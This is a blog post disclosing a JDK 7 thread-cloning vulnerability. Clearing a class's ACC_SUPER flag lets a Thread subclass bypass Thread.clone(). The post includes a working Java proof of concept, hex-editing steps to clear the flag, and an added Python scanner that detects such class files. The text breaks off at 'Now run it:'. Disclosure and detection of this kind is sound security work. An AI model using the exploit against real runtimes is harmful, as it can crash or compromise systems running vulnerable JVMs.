JDK 7 Thread Cloning Vulnerability

This blog entry was originally posted on June 23, 2011, but was deleted as Oracle asked me to take it down while they investigate. After more than a year, the issue still has not been addressed, so I notified Oracle that I wanted to repost the blog entry and received no response. -- Jeroen

I warned on the mailing list when this came up, but apparently was ignored, so maybe a blog post will help.

In one of last year's updates of JDK 6 the cloning vulnerability was fixed in a hackish, but clever and safe way. Now in JDK 7 they try to fix it by overriding Object.clone() with a version that simply throws CloneNotSupportedException. The only problem is, in Java (and .NET too) overriding a method is not a safe way to make the base class method unavailable.

The (still) not so well known ACC_SUPER flag, when it is not set on a class, allows that class to invoke any accessible method anywhere in its superclass hierarchy directly, skipping the overrides in between. So Thread.clone() can be skipped and Object.clone() called from any Thread subclass whose ACC_SUPER flag is cleared.

Here's an example:

    class Clone extends Thread implements Cloneable {
        public Object clone() {
            try {
                // With ACC_SUPER cleared on this class, super.clone() reaches
                // Object.clone() directly instead of Thread.clone().
                return super.clone();
            } catch (CloneNotSupportedException e) {
                throw new Error(e);
            }
        }
    }

    class Demo {
        public static void main(String[] args) throws Throwable {
            // A thread that never finishes on its own.
            Clone c1 = new Clone() {
                public void run() {
                    for (;;) {
                    }
                }
            };
            c1.start();
            Thread t = (Thread) c1.clone();   // a second Thread object sharing c1's native state
            c1.stop();
            c1.join();
            System.gc();
            t.stop();
        }
    }

Note that after you compile this with JDK 6 you'll need to edit Clone.class to clear the ACC_SUPER flag. Use a hex editor to replace the 20 (hex) in the class's access_flags field with 00, or download a copy here.
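A defender-side check for this, added here as an example and not part of the original post: a small Python script that parses a class file's header (magic, version, constant pool) to reach the class-level access_flags field and reports concrete classes whose ACC_SUPER bit (0x0020) is cleared, which is exactly what the hex edit above produces. The class-file prefix it checks is constructed inline (a header plus a four-entry constant pool, not a loadable class), and scan_class_files is an assumed helper name for walking a build output directory.

```python
import struct
from pathlib import Path

ACC_SUPER = 0x0020
ACC_INTERFACE = 0x0200

# Byte width of the fixed-size constant pool entries, by tag (JVMS section 4.4).
_FIXED_CP_SIZES = {
    3: 4, 4: 4,             # Integer, Float
    5: 8, 6: 8,             # Long, Double (each occupies two pool slots)
    7: 2, 8: 2,             # Class, String
    9: 4, 10: 4, 11: 4,     # Fieldref, Methodref, InterfaceMethodref
    12: 4,                  # NameAndType
    15: 3,                  # MethodHandle (u1 kind + u2 index)
    16: 2,                  # MethodType
    17: 4, 18: 4,           # Dynamic, InvokeDynamic
    19: 2, 20: 2,           # Module, Package
}


def read_access_flags(data: bytes) -> int:
    """Return the class-level access_flags of a class file by walking past the constant pool."""
    if data[:4] != b"\xca\xfe\xba\xbe":
        raise ValueError("not a class file")
    (cp_count,) = struct.unpack_from(">H", data, 8)
    off = 10          # first constant pool entry
    idx = 1           # pool indices are 1-based; slot 0 is unused
    while idx < cp_count:
        tag = data[off]
        if tag == 1:  # Utf8: u2 length followed by that many bytes
            (length,) = struct.unpack_from(">H", data, off + 1)
            off += 3 + length
        elif tag in _FIXED_CP_SIZES:
            off += 1 + _FIXED_CP_SIZES[tag]
        else:
            raise ValueError(f"unknown constant pool tag {tag} at offset {off}")
        idx += 2 if tag in (5, 6) else 1   # Long/Double take two slots
    (flags,) = struct.unpack_from(">H", data, off)
    return flags


def missing_acc_super(data: bytes) -> bool:
    """True for a concrete class (not an interface) whose ACC_SUPER bit is cleared."""
    flags = read_access_flags(data)
    return not (flags & ACC_INTERFACE) and not (flags & ACC_SUPER)


def scan_class_files(root) -> list:
    """Assumed helper: list every .class file under root that missing_acc_super() flags."""
    hits = []
    for path in Path(root).rglob("*.class"):
        try:
            if missing_acc_super(path.read_bytes()):
                hits.append(str(path))
        except ValueError:
            continue  # not a parseable class file; skip it
    return hits


def build_sample_header(access_flags: int, with_long: bool = False) -> bytes:
    """Constructed test input: magic, version 50.0, a small constant pool, then
    access_flags/this_class/super_class. Only the prefix read_access_flags needs."""
    cp = b"\x01" + struct.pack(">H", 5) + b"Clone"                 # #1 Utf8 "Clone"
    cp += b"\x07" + struct.pack(">H", 1)                            # #2 Class -> #1
    cp += b"\x01" + struct.pack(">H", 16) + b"java/lang/Thread"     # #3 Utf8
    cp += b"\x07" + struct.pack(">H", 3)                            # #4 Class -> #3
    cp_count = 5
    if with_long:
        cp += b"\x05" + struct.pack(">Q", 42)                       # #5-#6 Long (two slots)
        cp_count += 2
    return (b"\xca\xfe\xba\xbe" + struct.pack(">HH", 0, 50)
            + struct.pack(">H", cp_count) + cp
            + struct.pack(">HHH", access_flags, 2, 4))


if __name__ == "__main__":
    import sys
    for hit in scan_class_files(sys.argv[1] if len(sys.argv) > 1 else "."):
        print("ACC_SUPER cleared:", hit)
```

Interfaces legitimately lack ACC_SUPER, which is why the check excludes them rather than flagging every class without the bit. Since Java SE 8 the JVM specification says the virtual machine treats ACC_SUPER as set in every class file regardless of the stored value, so this scan is mainly useful for code that will run on older runtimes such as the JDK 6 and 7 releases discussed here.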

Now run it: